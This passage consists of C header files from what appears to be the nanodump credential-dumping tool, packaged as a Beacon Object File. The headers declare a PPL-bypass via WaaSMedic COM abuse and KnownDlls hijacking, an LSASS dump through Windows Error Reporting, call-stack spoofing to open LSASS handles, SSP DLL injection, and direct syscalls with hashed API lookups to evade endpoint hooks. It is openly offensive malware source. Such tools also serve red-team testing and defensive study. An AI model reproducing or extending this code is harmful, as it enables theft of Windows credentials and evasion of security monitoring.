#define GetExitCodeThread_SW2_HASH         0xB69934BF
#define LoadLibraryW_SW2_HASH              0x3EBB5CB0

typedef struct _IWaaSRemediationExVtbl {
    /*** IUnknown methods ***/
    HRESULT (STDMETHODCALLTYPE *QueryInterface)(
        IDispatch *This,
        REFIID riid,
        void **ppvObject);

    ULONG (STDMETHODCALLTYPE *AddRef)(
        IDispatch *This);

    ULONG (STDMETHODCALLTYPE *Release)(
        IDispatch *This);

    /*** IDispatch methods ***/
    HRESULT (STDMETHODCALLTYPE *GetTypeInfoCount)(
        IDispatch *This,
        UINT *pctinfo);

    HRESULT (STDMETHODCALLTYPE *GetTypeInfo)(
        IDispatch *This,
        UINT iTInfo,
        LCID lcid,
        ITypeInfo **ppTInfo);

    HRESULT (STDMETHODCALLTYPE *GetIDsOfNames)(
        IDispatch *This,
        REFIID riid,
        LPOLESTR *rgszNames,
        UINT cNames,
        LCID lcid,
        DISPID *rgDispId);

    HRESULT (STDMETHODCALLTYPE *Invoke)(
        IDispatch *This,
        DISPID dispIdMember,
        REFIID riid,
        LCID lcid,
        WORD wFlags,
        DISPPARAMS *pDispParams,
        VARIANT *pVarResult,
        EXCEPINFO *pExcepInfo,
        UINT *puArgErr);

    /*** IWaaSRemediationEx methods ***/
    HRESULT (STDMETHODCALLTYPE *LaunchDetectionOnly)(
        IDispatch *This,
        BSTR bstrCallerApplicationName,
        ULONGLONG pbstrPlugins);

    HRESULT (STDMETHODCALLTYPE *LaunchRemediationOnly)(
        IDispatch *This,
        BSTR bstrPlugins,
        BSTR bstrCallerApplicationName,
        ULONGLONG varResults);
}IWaaSRemediationExVtbl, *PIWaaSRemediationExVtbl;

typedef struct _ITaskHandlerVtbl {
    /*** IUnknown methods ***/
    HRESULT (STDMETHODCALLTYPE *QueryInterface)(
        IDispatch *This,
        REFIID riid,
        void **ppvObject);

    ULONG (STDMETHODCALLTYPE *AddRef)(
        IDispatch *This);

    ULONG (STDMETHODCALLTYPE *Release)(
        IDispatch *This);

    /*** ITaskHandler methods ***/
    HRESULT (STDMETHODCALLTYPE *Start)(
        IUnknown *This,
        IUnknown* pHandlerServices,
        BSTR data);

    HRESULT (STDMETHODCALLTYPE *Stop)(
        IUnknown *This,
        HRESULT* pRetCode);

    HRESULT (STDMETHODCALLTYPE *Pause)(
        IUnknown *This);

    HRESULT (STDMETHODCALLTYPE *Resume)(
        IUnknown *This);
}ITaskHandlerVtbl, *PITaskHandlerVtbl;

typedef struct _IWaaSRemediationEx {
    IWaaSRemediationExVtbl* lpVtbl;
} IWaaSRemediationEx, *PIWaaSRemediationEx;

typedef struct _ITaskHandler {
    ITaskHandlerVtbl* lpVtbl;
} ITaskHandler, *PITaskHandler;

typedef struct _WRITE_REMOTE_KNOWN_DLL_HANDLE_PARAM
{
    ULONG32 Strategy;
    IWaaSRemediationEx* WaaSRemediationEx;
    ULONG_PTR WriteAtLaunchDetectionOnly;
    ULONG_PTR WriteAtLaunchRemediationOnly;
    DISPID DispIdLaunchDetectionOnly;
    DISPID DispIdLaunchRemediationOnly;
    BSTR CallerApplicationName;
    BSTR Plugins;
} WRITE_REMOTE_KNOWN_DLL_HANDLE_PARAM, * PWRITE_REMOTE_KNOWN_DLL_HANDLE_PARAM;

typedef struct _WRITE_REMOTE_DLL_SEARCH_PATH_FLAG_PARAM
{
    IWaaSRemediationEx* WaaSRemediationEx;
    ULONG_PTR WriteAt;
    DISPID DispIdLaunchRemediationOnly;
    BSTR CallerApplicationName;
    BSTR Plugins;
} WRITE_REMOTE_DLL_SEARCH_PATH_FLAG_PARAM, * PWRITE_REMOTE_DLL_SEARCH_PATH_FLAG_PARAM;

#define IWaaSRemediationEx_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)   \
    ( ((PIWaaSRemediationEx)This)->lpVtbl -> Invoke((IDispatch *)This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) )

#define IWaaSRemediationEx_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) \
    ( ((PIWaaSRemediationEx)This)->lpVtbl -> GetIDsOfNames((IDispatch *)This,riid,rgszNames,cNames,lcid,rgDispId) )

#define IWaaSRemediationEx_Release(This)  \
    ( ((PIWaaSRemediationEx)This)->lpVtbl -> Release((IDispatch *)This) )

#define ITaskHandler_Release(This) \
    ( ((PITaskHandler)This)->lpVtbl -> Release((IDispatch *)This) )

BOOL initialize_interface(
    PIWaaSRemediationEx* IWaaSRemediationExPtr);

BOOL find_combase_dll_search_flag_address(
    IN PULONG_PTR Address);

DWORD WINAPI write_remote_dll_search_path_flag_thread(LPVOID Parameter);

BOOL write_remote_dll_search_path_flag(
    IN PIWaaSRemediationEx IWaaSRemediationEx,
    IN DISPID DispIdLaunchRemediationOnly);

BOOL resolve_dispatch_ids(
    IN PIWaaSRemediationEx IWaaSRemediationEx,
    OUT DISPID *DispIdLaunchDetectionOnly,
    OUT DISPID *DispIdLaunchRemediationOnly);

BOOL calculate_write_addresses(
    IN PVOID BaseAddress,
    IN ULONG32 TargetValue,
    OUT PDWORD64 WriteAtLaunchDetectionOnly,
    OUT PDWORD64 WriteAtLaunchRemediationOnly);

BOOL write_remote_known_dll_handle(
    IN PIWaaSRemediationEx IWaaSRemediationEx,
    IN LONG TargetValue,
    IN DISPID DispIdLaunchDetectionOnly,
    IN DISPID DispIdLaunchRemediationOnly,
    IN DWORD64 WriteAtLaunchDetectionOnly,
    IN DWORD64 WriteAtLaunchRemediationOnly);

BOOL create_task_handler_instance();

BOOL release_client(
    IN PIWaaSRemediationEx IWaaSRemediationEx);


================================================
FILE: Creds-BOF/nanodump/include/ppl/ppl_medic_dll.h
================================================

#include "dinvoke.h"

typedef HANDLE(WINAPI* OpenEventW_t)(DWORD dwDesiredAccess, BOOL bInheritHandle, LPCWSTR lpName);
typedef BOOL(WINAPI* SetEvent_t)(HANDLE hEvent);

#define CreateFileTransactedW_SW2_HASH 0x968D0D41
#define OpenEventW_SW2_HASH            0x9E08A2EF
#define SetEvent_SW2_HASH              0x5A8072DC

BOOL signal_dll_load_event(
    IN LPWSTR event_name);


================================================
FILE: Creds-BOF/nanodump/include/ppl/ppl_utils.h
================================================
#pragma once

#include <windows.h>
#include <winternl.h>

#include "utils.h"
#include "dinvoke.h"
#include "handle.h"
#include "syscalls.h"
#include "ppl/ppl_utils.h"
#include "ppl/ppl_medic.h"
#include "ppl/ppl.h"

#define LdrGetKnownDllSectionHandle_SW2_HASH 0xABB7D960

typedef RPC_STATUS(WINAPI*  UuidToStringW_t)(UUID *Uuid, RPC_WSTR *StringUuid);
typedef RPC_STATUS(WINAPI*  RpcStringFreeW_t)(RPC_WSTR *String);
typedef PIMAGE_NT_HEADERS(NTAPI* RtlImageNtHeader_t)(PVOID ModuleAddress);
typedef BOOL(WINAPI* ControlService_t)(SC_HANDLE hService, DWORD dwControl, LPSERVICE_STATUS lpServiceStatus);
typedef PVOID(WINAPI* Sleep_t)(DWORD dwMilliseconds);
typedef DWORD(WINAPI* GetCurrentDirectoryW_t)(DWORD nBufferLength, LPWSTR lpBuffer);
typedef BOOL(WINAPI* SetCurrentDirectoryW_t)(LPCWSTR lpPathName);
typedef HANDLE(WINAPI* CreateFileW_t)(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
typedef DWORD(WINAPI* GetFileSize_t)(HANDLE hFile, LPDWORD lpFileSizeHigh);
typedef BOOL(WINAPI* StartServiceW_t)(SC_HANDLE hService, DWORD dwNumServiceArgs, LPCWSTR *lpServiceArgVectors);
typedef LSTATUS(WINAPI* RegOpenKeyExW_t)(HKEY hKey, LPCWSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult);
typedef LSTATUS(WINAPI* RegQueryValueExW_t)(HKEY hKey, LPCWSTR lpValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData);
typedef DWORD(WINAPI* GetTempPathW_t)(DWORD nBufferLength, LPWSTR lpBuffer);
typedef UINT(WINAPI* GetTempFileNameW_t)(LPCWSTR lpPathName, LPCWSTR lpPrefixString, UINT uUnique, LPWSTR lpTempFileName);
typedef BOOL(WINAPI* QueryServiceStatusEx_t)(SC_HANDLE hService, SC_STATUS_TYPE InfoLevel, LPBYTE lpBuffer, DWORD cbBufSize, LPDWORD pcbBytesNeeded);
typedef LSTATUS(WINAPI* RegSetValueExW_t)(HKEY hKey, LPCWSTR lpValueName, DWORD Reserved, DWORD dwType, PBYTE lpData, DWORD cbData);
typedef LSTATUS(WINAPI* RegCloseKey_t)(HKEY hKey);
typedef BOOL(WINAPI* RemoveDirectoryW_t)(LPCWSTR lpPathName);

#define UuidToStringW_SW2_HASH        0x0A907D4E
#define RpcStringFreeW_SW2_HASH       0x0C953D0F
#define RtlImageNtHeader_SW2_HASH     0x00BCFBB5
#define ControlService_SW2_HASH       0x6EC9F5F5
#define Sleep_SW2_HASH                0x1AA40C23
#define GetCurrentDirectoryW_SW2_HASH 0x7495613A
#define SetCurrentDirectoryW_SW2_HASH 0x0E8F3B04
#define CreateFileW_SW2_HASH          0x24976EA4
#define GetFileSize_SW2_HASH          0xF850E4E6
#define StartServiceW_SW2_HASH        0xF9C506E6
#define RegOpenKeyExW_SW2_HASH        0xD9860929
#define RegQueryValueExW_SW2_HASH     0xE31FB5B7
#define GetTempPathW_SW2_HASH         0x7D51ED68
#define GetTempFileNameW_SW2_HASH     0x132B8414
#define QueryServiceStatusEx_SW2_HASH 0x1D84EAF8
#define RegSetValueExW_SW2_HASH       0x1A1D0AD5
#define RegCloseKey_SW2_HASH          0xE6251DA5
#define RemoveDirectoryW_SW2_HASH     0x10D13916

#define DIRECTORY_QUERY 0x0001
#define DIRECTORY_TRAVERSE 0x0002
#define DIRECTORY_CREATE_OBJECT 0x0004
#define DIRECTORY_CREATE_SUBDIRECTORY 0x0008
#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)
#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)

#define SYMBOLIC_LINK_QUERY 0x0001

#if defined(_MSC_VER)

#define FileStandardInformation 5
#define ThreadImpersonationToken 5

typedef struct _FILE_STANDARD_INFORMATION {
  LARGE_INTEGER AllocationSize;
  LARGE_INTEGER EndOfFile;
  ULONG         NumberOfLinks;
  BOOLEAN       DeletePending;
  BOOLEAN       Directory;
} FILE_STANDARD_INFORMATION, *PFILE_STANDARD_INFORMATION;

typedef struct _OBJECT_NAME_INFORMATION {
  UNICODE_STRING Name;
} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION;

#define ObjectNameInformation 1

#endif

BOOL is_win_6_point_3_or_grater(VOID);

BOOL is_win_10_or_grater(VOID);

BOOL object_manager_create_directory(
    IN LPWSTR dirname,
    OUT PHANDLE hDirectory);

BOOL object_manager_create_symlik(
    IN LPWSTR linkname,
    IN LPWSTR targetname,
    OUT PHANDLE hLink);

BOOL check_known_dll_symbolic_link(
    IN LPCWSTR pwszDllName,
    IN LPWSTR pwszTarget);

BOOL get_file_size(
    IN HANDLE hFile,
    OUT PDWORD file_size);

VOID safe_close_handle(
    IN PHANDLE Handle);

BOOL get_hijacked_dll_name(
    OUT LPWSTR* HijackedDllName,
    OUT LPWSTR* HijackedDllSectionPath);

BOOL find_writable_system_dll(
    IN DWORD MinSize,
    OUT LPWSTR* FilePath);

BOOL get_known_dlls_handle_address(
    IN PVOID* KnownDllDirectoryHandleAddr);

BOOL set_registry_string_value(
    IN HKEY Key,
    IN LPCWSTR SubKey,
    IN LPCWSTR ValueName,
    IN LPCWSTR ValueData);

BOOL get_type_lib_reg_value_path(
    IN LPWSTR* TypeLibRegValuePath);

BOOL get_registry_string_value(
    IN HKEY Key,
    IN LPCWSTR SubKey,
    IN LPCWSTR ValueName,
    OUT LPWSTR* ValueData);

VOID safe_release(
    IN IUnknown** Interface);

BOOL generate_temp_path(
    OUT LPWSTR* Buffer);

BOOL get_service_process_id(
    IN LPCWSTR ServiceName,
    OUT LPDWORD ProcessId);

BOOL query_service_status_process_by_handle(
    IN SC_HANDLE ServiceHandle,
    IN OUT LPSERVICE_STATUS_PROCESS ServiceStatus);

BOOL get_service_handle(
    IN LPCWSTR ServiceName,
    IN DWORD DesiredAccess,
    OUT LPSC_HANDLE ServiceHandle);

BOOL query_service_status_process_by_name(
    IN LPCWSTR ServiceName,
    IN OUT LPSERVICE_STATUS_PROCESS ServiceStatus);

BOOL get_service_status_by_name(
    IN LPCWSTR ServiceName,
    OUT LPDWORD Status);

BOOL stop_service_by_name(
    IN LPCWSTR ServiceName,
    IN BOOL Wait);

BOOL start_service_by_name(
    IN LPCWSTR ServiceName,
    IN BOOL Wait);

VOID safe_free(
    IN PVOID* Memory);

BOOL get_windows_temp_directory(
    OUT LPWSTR* Path);

BOOL find_module_section(
    IN HMODULE Module,
    IN LPCSTR SectionName,
    OUT PULONG_PTR Address,
    OUT LPDWORD Size);

BOOL find_module_pattern(
    IN PBYTE Pattern,
    IN DWORD PatternLength,
    IN ULONG_PTR Address,
    IN DWORD Size,
    OUT PULONG_PTR PatternAddress);

BOOL is_service_running(
    IN LPCWSTR ServiceName);

BOOL delete_directory(
    IN LPWSTR Path);


================================================
FILE: Creds-BOF/nanodump/include/shtinkering.h
================================================
#pragma once

#include <windows.h>
#include <winternl.h>

#include "dinvoke.h"
#include "syscalls.h"

#ifndef EVENT_QUERY_STATE
#define EVENT_QUERY_STATE 0x0001
#endif

#ifndef ALPC_MSGFLG_SYNC_REQUEST
#define ALPC_MSGFLG_SYNC_REQUEST   0x20000
#endif

#define SHTINKERING_KEY L"\\Registry\\Machine\\Software\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\"
#ifndef LOCAL_DUMP
#define LOCAL_DUMP 0x2
#endif

typedef struct _EVENT_DESCRIPTOR {
  USHORT    Id;
  UCHAR     Version;
  UCHAR     Channel;
  UCHAR     Level;
  UCHAR     Opcode;
  USHORT    Task;
  ULONGLONG Keyword;
} EVENT_DESCRIPTOR, *PEVENT_DESCRIPTOR;

typedef struct _EVENT_DATA_DESCRIPTOR {
  ULONGLONG Ptr;
  ULONG     Size;
  union {
    ULONG Reserved;
    struct {
      UCHAR  Type;
      UCHAR  Reserved1;
      USHORT Reserved2;
    } DUMMYSTRUCTNAME;
  } DUMMYUNIONNAME;
} EVENT_DATA_DESCRIPTOR, *PEVENT_DATA_DESCRIPTOR;

typedef ULONG(WINAPI* EtwEventWriteNoRegistration_t) (GUID const *ProviderId, EVENT_DESCRIPTOR const *EventDescriptor, ULONG UserDataCount, EVENT_DATA_DESCRIPTOR *UserData);

#define EtwEventWriteNoRegistration_SW2_HASH 0x980FF899
#define NtUpdateWnfStateData_SW2_HASH 0x6CC3F2FE
#define GetEnvironmentVariableW_SW2_HASH 0x2F9C600B

enum WerSvcMessageId
{
    RequestReportUnhandledException = 0x20000000,
    ReplyReportUnhandledExceptionSuccess = 0x20000001,
    ReplyReportUnhandledExceptionFailure = 0x20000002,
    RequestSilentProcessExit = 0x30000000,
    ResponseSilentProcessExitSuccess = 0x30000001,
    ResponseSilentProcessExitFailure = 0x30000002
};

typedef struct _MappedViewStruct
{
    DWORD Size;
    DWORD TargetProcessPid;
    DWORD TargetThreadTid;
    DWORD Filler0[39];
    EXCEPTION_POINTERS* ExceptionPointers;
#ifndef _WIN64
    DWORD Filler1;
#endif
    DWORD NtErrorCode;
    DWORD Filler2;
    HANDLE hTargetProcess;
#ifndef _WIN64
    DWORD Filler3;
#endif
    HANDLE hTargetThread;
#ifndef _WIN64
    DWORD Filler4;
#endif
    HANDLE hRecoveryEvent;
#ifndef _WIN64
    DWORD Filler5;
#endif
    HANDLE hCompletionEvent;
#ifndef _WIN64
    DWORD Filler6;
#endif
    DWORD Filler7;
    DWORD Filler8;
    DWORD Null01;
    DWORD Null02;
    DWORD NtStatusErrorCode;
    DWORD Null03;
    DWORD TickCount;
    DWORD Unk101;
} MappedViewStruct, *PMappedViewStruct;

BOOL wait_for_wersvc(VOID);

BOOL signal_start_wersvc(VOID);

BOOL send_message_to_wer_service(
    IN PVOID SendingMessage,
    OUT PVOID ReceivingMessage);

BOOL find_valid_thread_id(
    IN DWORD process_id,
    OUT PDWORD pthread_id);

BOOL werfault_shtinkering(
    IN DWORD lsass_pid,
    IN HANDLE hProcess);


================================================
FILE: Creds-BOF/nanodump/include/spoof_callstack.h
================================================
#pragma once

#if defined(NANO) && !defined(SSP)

#include <windows.h>
#include <winternl.h>

#include "ntdefs.h"
#include "utils.h"
#include "dinvoke.h"

#define NtOpenProcess_SW2_HASH 0xcd9b2a0f

#if defined(__clang__)
 #define SET_SYNTAX ".intel_syntax noprefix \n"
#else
 #define SET_SYNTAX
#endif

#ifdef _WIN64

typedef struct _SYSCALL_DATA
{
    PVOID full_stack_base;        // 0x00
    ULONG_PTR full_stack_size;    // 0x08
    PVOID full_stack_backup_addr; // 0x10
    PVOID fake_stack_heap_addr;   // 0x18
    ULONG_PTR fake_stack_size;    // 0x20
    PVOID fake_stack_target_addr; // 0x28
    PVOID fake_stack_rsp;         // 0x30
    PVOID fake_stack_rbp;         // 0x38
    PVOID canary_addr;            // 0x40
    union {
        PVOID syscall_addr;       // 0x48
        PVOID api_addr;           // 0x48
    };
    ULONG32 syscall_number;       // 0x50
    BOOL is_api_call;             // 0x54
    BOOL is_wow64;                // 0x58
    ULONG32 num_params;           // 0x5c
    ULONG_PTR params[10];         // 0x60+0x8*i
} SYSCALL_DATA, *PSYSCALL_DATA;

#else

typedef struct _SYSCALL_DATA
{
    PVOID full_stack_base;        // 0x00
    ULONG_PTR full_stack_size;    // 0x04
    PVOID full_stack_backup_addr; // 0x08
    PVOID fake_stack_heap_addr;   // 0x0c
    ULONG_PTR fake_stack_size;    // 0x10
    PVOID fake_stack_target_addr; // 0x14
    PVOID fake_stack_rsp;         // 0x18
    PVOID fake_stack_rbp;         // 0x1c
    PVOID canary_addr;            // 0x20
    union {
        PVOID syscall_addr;       // 0x24
        PVOID api_addr;           // 0x24
    };
    ULONG32 syscall_number;       // 0x28
    BOOL is_api_call;             // 0x2c
    BOOL is_wow64;                // 0x30
    ULONG32 num_params;           // 0x34
    ULONG_PTR params[10];         // 0x38+0x4*i
} SYSCALL_DATA, *PSYSCALL_DATA;

#endif

#ifndef UNWIND_HISTORY_TABLE_SIZE

  #define UNWIND_HISTORY_TABLE_SIZE 12

  typedef struct _FRAME_POINTERS {
    ULONGLONG MemoryStackFp;
    ULONGLONG BackingStoreFp;
  } FRAME_POINTERS,*PFRAME_POINTERS;

  typedef struct _RUNTIME_FUNCTION {
      ULONG BeginAddress;
      ULONG EndAddress;
      ULONG UnwindData;
  } RUNTIME_FUNCTION, *PRUNTIME_FUNCTION;

  typedef struct _UNWIND_HISTORY_TABLE_ENTRY {
    ULONG64 ImageBase;
    ULONG64 Gp;
    PRUNTIME_FUNCTION FunctionEntry;
  } UNWIND_HISTORY_TABLE_ENTRY,*PUNWIND_HISTORY_TABLE_ENTRY;

  typedef struct _UNWIND_HISTORY_TABLE {
    ULONG Count;
    UCHAR Search;
    ULONG64 LowAddress;
    ULONG64 HighAddress;
    UNWIND_HISTORY_TABLE_ENTRY Entry[UNWIND_HISTORY_TABLE_SIZE];
  } UNWIND_HISTORY_TABLE,*PUNWIND_HISTORY_TABLE;

#endif

#ifndef UNW_FLAG_CHAININFO
  #define UNW_FLAG_CHAININFO  0x4
#endif

#define UNUSED(x) (void)(x)

#define MAX_FRAME_NUM 30
#define RBP_OP_INFO 0x5

//
// Used to store information for individual stack frames for call stack to spoof.
//
typedef struct _STACK_FRAME {
    WCHAR targetDll[MAX_PATH];
    WCHAR target_dll_name[MAX_PATH];
    DWORD functionHash;
    CHAR function_name[MAX_PATH];
    ULONG offset;
    ULONG totalStackSize;
    BOOL setsFramePointer;
    PVOID returnAddress;
    BOOL pushRbp;
    ULONG countOfCodes;
    BOOL pushRbpIndex;
    ULONG32 pattern_size;
    CHAR pattern[256];
    BYTE byte_match[256];
    BOOL is_valid;
    PVOID function_addr;
    ULONG32 final_offset;
    BOOL push_frame;
    BOOL is_exception;
} STACK_FRAME, *PSTACK_FRAME;

//
// Unwind op codes: https://docs.microsoft.com/en-us/cpp/build/exception-handling-x64?view=msvc-170
//
typedef enum _UNWIND_OP_CODES {
    UWOP_PUSH_NONVOL = 0, /* info == register number */
    UWOP_ALLOC_LARGE,     /* no info, alloc size in next 2 slots */
    UWOP_ALLOC_SMALL,     /* info == size of allocation / 8 - 1 */
    UWOP_SET_FPREG,       /* no info, FP = RSP + UNWIND_INFO.FPRegOffset*16 */
    UWOP_SAVE_NONVOL,     /* info == register number, offset in next slot */
    UWOP_SAVE_NONVOL_FAR, /* info == register number, offset in next 2 slots */
    UWOP_EPILOG,
    UWOP_SPARE_CODE,
    UWOP_SAVE_XMM128, /* info == XMM reg number, offset in next slot */
    UWOP_SAVE_XMM128_FAR, /* info == XMM reg number, offset in next 2 slots */
    UWOP_PUSH_MACHFRAME   /* info == 0: no error-code, 1: error-code */
} UNWIND_CODE_OPS;

typedef unsigned char UBYTE;

typedef union _UNWIND_CODE {
    struct {
        UBYTE CodeOffset;
        UBYTE UnwindOp : 4;
        UBYTE OpInfo   : 4;
    };
    USHORT FrameOffset;
} UNWIND_CODE, *PUNWIND_CODE;

typedef struct _UNWIND_INFO {
    UBYTE Version       : 3;
    UBYTE Flags         : 5;
    UBYTE SizeOfProlog;
    UBYTE CountOfCodes;
    UBYTE FrameRegister : 4;
    UBYTE FrameOffset   : 4;
    UNWIND_CODE UnwindCode[1];
/*  UNWIND_CODE MoreUnwindCode[((CountOfCodes + 1) & ~1) - 1];
*   union {
*       OPTIONAL ULONG ExceptionHandler;
*       OPTIONAL ULONG FunctionEntry;
*   };
*   OPTIONAL ULONG ExceptionData[]; */
} UNWIND_INFO, *PUNWIND_INFO;

typedef struct _STACK_INFO {
    PVOID full_stack_base;
    ULONG64 full_stack_size;
    PVOID full_stack_backup_addr;
    PVOID fake_stack_heap_addr;
    ULONG64 fake_stack_size;
    PVOID fake_stack_target_addr;
    PVOID fake_stack_rsp;
    PVOID fake_stack_rbp;
    PVOID canary_addr;
    PVOID first_ret_addr;
    PVOID storing_area;
} STACK_INFO, *PSTACK_INFO;

BOOL lookup_function_entry(
    IN ULONG_PTR ControlPc,
    PRUNTIME_FUNCTION* pFunctionEntry,
    PVOID* pImageBase);

DWORD64 get_module_base(VOID);

BOOL create_fake_callstack(
    PSTACK_INFO stack_info,
    ULONG32 function_hash);

HANDLE open_handle_with_spoofed_callstack(
    IN DWORD lsass_pid,
    IN DWORD permissions,
    IN DWORD attributes);

PNT_TIB get_tib();

#endif


================================================
FILE: Creds-BOF/nanodump/include/ssp/ssp.h
================================================
#pragma once

#define WIN32_NO_STATUS
#define SECURITY_WIN32
#include <windows.h>
#include <winternl.h>
#include <sspi.h>

#include "dinvoke.h"
#include "nanodump.h"
#include "output.h"
#if PASS_PARAMS_VIA_NAMED_PIPES == 1
#include "pipe.h"
#endif

typedef NTSTATUS(WINAPI* AddSecurityPackageW_t) (LPWSTR pszPackageName, PSECURITY_PACKAGE_OPTIONS pOptions);
typedef HANDLE(WINAPI* CreateThread_t)(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);

#define AddSecurityPackageW_SW2_HASH 0x09B08696
#define CreateThread_SW2_HASH        0x2C912627

#define SSPICLI_DLL L"SSPICLI.DLL"

DWORD WINAPI load_ssp(LPVOID Parameter);


================================================
FILE: Creds-BOF/nanodump/include/ssp/ssp_utils.h
================================================
#pragma once

#include <windows.h>

#define DLL_NAME_LENGTH 10

typedef PVOID(WINAPI* Sleep_t)(DWORD dwMilliseconds);

#define Sleep_SW2_HASH               0x1AA40C23

BOOL generate_random_dll_path(
    OUT LPSTR* random_path);

BOOL write_ssp_dll(
    IN LPSTR ssp_dll_path,
    IN unsigned char nanodump_ssp_dll[],
    IN unsigned int nanodump_ssp_dll_len);

#if PASS_PARAMS_VIA_NAMED_PIPES == 1
BOOL send_parameters_and_get_result(
    IN LPSTR dump_path,
    IN BOOL use_valid_sig,
    OUT PBOOL dump_worked);
#endif


================================================
FILE: Creds-BOF/nanodump/include/ssp.h
================================================

#define SECURITY_WIN32
#include <sspi.h>


================================================
FILE: Creds-BOF/nanodump/include/syscalls.h
================================================
#pragma once

// Code below is adapted from @modexpblog. Read linked article for more details.
// https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams

#ifndef SW2_HEADER_H_
#define SW2_HEADER_H_

#include <windows.h>

#include "utils.h"

#define ZwOpenProcess_SW2_HASH 0xCD9B2A0F

#if defined(__clang__)
 #define SET_SYNTAX ".intel_syntax noprefix \n"
#else
 #define SET_SYNTAX
#endif

#define SW2_SEED 0x1337C0DE
#define SW2_ROL8(v) (v << 8 | v >> 24)
#define SW2_ROR8(v) (v >> 8 | v << 24)
#define SW2_ROX8(v) ((SW2_SEED % 2) ? SW2_ROL8(v) : SW2_ROR8(v))
#define SW2_MAX_ENTRIES 550
#define SW2_RVA2VA(Type, DllBase, Rva) (Type)((ULONG_PTR) DllBase + Rva)

#ifdef _M_IX86
 // x86 has conflicting types with these functions
 #define NtClose _NtClose
 #define NtQueryInformationProcess _NtQueryInformationProcess
 #define NtCreateFile _NtCreateFile
 #define NtQuerySystemInformation _NtQuerySystemInformation
 #define NtWaitForSingleObject _NtWaitForSingleObject
 #define NtQueryInformationFile _NtQueryInformationFile
#endif
// Typedefs are prefixed to avoid pollution.

typedef struct _SW2_SYSCALL_ENTRY
{
    DWORD Hash;
    DWORD Address;
    PVOID SyscallAddress;
} SW2_SYSCALL_ENTRY, *PSW2_SYSCALL_ENTRY;

typedef struct _SW2_SYSCALL_LIST
{
    DWORD Count;
    SW2_SYSCALL_ENTRY Entries[SW2_MAX_ENTRIES];
} SW2_SYSCALL_LIST, *PSW2_SYSCALL_LIST;

typedef struct _SW2_PEB_LDR_DATA {
	BYTE Reserved1[8];
	PVOID Reserved2[3];
	LIST_ENTRY InMemoryOrderModuleList;
} SW2_PEB_LDR_DATA, *PSW2_PEB_LDR_DATA;

typedef struct _SW2_LDR_DATA_TABLE_ENTRY {
	PVOID Reserved1[2];
	LIST_ENTRY InMemoryOrderLinks;
	PVOID Reserved2[2];
	PVOID DllBase;
} SW2_LDR_DATA_TABLE_ENTRY, *PSW2_LDR_DATA_TABLE_ENTRY;

typedef struct _SW2_PEB {
	BYTE Reserved1[2];
	BYTE BeingDebugged;
	BYTE Reserved2[1];
	PVOID Reserved3[2];
	PSW2_PEB_LDR_DATA Ldr;
} SW2_PEB, *PSW2_PEB;

PVOID get_ntopenprocess_syscall_address(VOID);

DWORD SW2_HashSyscall(
    IN PCSTR FunctionName);

PVOID GetSyscallAddress(
    IN PVOID nt_api_address,
    IN ULONG32 size_of_ntapi);

BOOL SW2_PopulateSyscallList(VOID);

BOOL local_is_wow64(VOID);

PVOID getIP(VOID);

void SyscallNotFound(VOID);

#if defined(__GNUC__)
DWORD SW2_GetSyscallNumber(IN DWORD FunctionHash) asm ("SW2_GetSyscallNumber");
PVOID SW3_GetSyscallAddress(IN DWORD FunctionHash) asm ("SW3_GetSyscallAddress");
#else
DWORD SW2_GetSyscallNumber(IN DWORD FunctionHash);
PVOID SW3_GetSyscallAddress(IN DWORD FunctionHash);
#endif

//typedef struct _IO_STATUS_BLOCK
//{
//	union
//	{
//		NTSTATUS Status;
//		VOID*    Pointer;
//	};
//	ULONG_PTR Information;
//} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

//typedef struct _UNICODE_STRING
//{
//	USHORT Length;
//	USHORT MaximumLength;
//	PWSTR  Buffer;
//} UNICODE_STRING, *PUNICODE_STRING;

#ifndef InitializeObjectAttributes
#define InitializeObjectAttributes( p, n, a, r, s ) { \
	(p)->Length = sizeof( OBJECT_ATTRIBUTES );        \
	(p)->RootDirectory = r;                           \
	(p)->Attributes = a;                              \
	(p)->ObjectName = n;                              \
	(p)->SecurityDescriptor = s;                      \
	(p)->SecurityQualityOfService = NULL;             \
}
#endif

//typedef struct _OBJECT_ATTRIBUTES
//{
//	ULONG           Length;
//	HANDLE          RootDirectory;
//	PUNICODE_STRING ObjectName;
//	ULONG           Attributes;
//	PVOID           SecurityDescriptor;
//	PVOID           SecurityQualityOfService;
//} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

typedef enum _MEMORY_INFORMATION_CLASS
{
	MemoryBasicInformation,
	MemoryWorkingSetInformation,
	MemoryMappedFilenameInformation,
	MemoryRegionInformation,
	MemoryWorkingSetExInformation,
	MemorySharedCommitInformation,
	MemoryImageInformation,
	MemoryRegionInformationEx,
	MemoryPrivilegedBasicInformation,
	MemoryEnclaveImageInformation,
	MemoryBasicInformationCapped
} MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS;

//typedef enum _THREADINFOCLASS
//{
//	ThreadBasicInformation,
//	ThreadTimes,
//	ThreadPriority,
//	ThreadBasePriority,
//	ThreadAffinityMask,
//	ThreadImpersonationToken,
//	ThreadDescriptorTableEntry,
//	ThreadEnableAlignmentFaultFixup,
//	ThreadEventPair_Reusable,
//	ThreadQuerySetWin32StartAddress,
//	ThreadZeroTlsCell,
//	ThreadPerformanceCount,
//	ThreadAmILastThread,
//	ThreadIdealProcessor,
